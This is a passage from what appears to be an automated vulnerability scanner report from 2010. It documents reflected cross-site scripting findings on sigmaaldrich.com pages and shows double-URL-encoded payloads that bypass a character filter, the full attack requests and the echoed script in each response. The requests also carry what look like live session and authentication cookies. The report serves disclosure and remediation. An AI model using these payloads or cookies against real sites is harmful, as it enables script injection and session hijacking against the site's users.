The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fbca%2522%253balert%25281%2529%252f%252fbb6e913b7f5 was submitted in the REST URL parameter 1. This input was echoed as 7fbca";alert(1)//bb6e913b7f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry7fbca%2522%253balert%25281%2529%252f%252fbb6e913b7f5/chemical-synthesis/chemical-synthesis-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:26 GMT
Content-Length: 28964
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry7fbca";alert(1)//bb6e913b7f5/chemical-synthesis/chemical-synthesis-catalog.html","E404") ;
   </script>
...[SNIP]...

1.47. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c91c%2522%253balert%25281%2529%252f%252f0941e48733 was submitted in the REST URL parameter 2. This input was echoed as 5c91c";alert(1)//0941e48733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis5c91c%2522%253balert%25281%2529%252f%252f0941e48733/chemical-synthesis-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:28 GMT
Content-Length: 28963
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis5c91c";alert(1)//0941e48733/chemical-synthesis-catalog.html","E404") ;
   </script>
...[SNIP]...

1.48. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf17%2522%253balert%25281%2529%252f%252faa51fede4f3 was submitted in the REST URL parameter 3. This input was echoed as aaf17";alert(1)//aa51fede4f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/aaf17%2522%253balert%25281%2529%252f%252faa51fede4f3 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/aaf17";alert(1)//aa51fede4f3","E404") ;
   </script>
...[SNIP]...

1.49. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861f7%2522%253balert%25281%2529%252f%252fd30ccf931f9 was submitted in the REST URL parameter 1. This input was echoed as 861f7";alert(1)//d30ccf931f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry861f7%2522%253balert%25281%2529%252f%252fd30ccf931f9/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:28 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry861f7";alert(1)//d30ccf931f9/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.50. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2581%2522%253balert%25281%2529%252f%252fda56d308be3 was submitted in the REST URL parameter 2. This input was echoed as a2581";alert(1)//da56d308be3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesisa2581%2522%253balert%25281%2529%252f%252fda56d308be3/learning-center/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesisa2581";alert(1)//da56d308be3/learning-center/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.51. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0367%2522%253balert%25281%2529%252f%252fb9e8ecba5c3 was submitted in the REST URL parameter 3. This input was echoed as b0367";alert(1)//b9e8ecba5c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

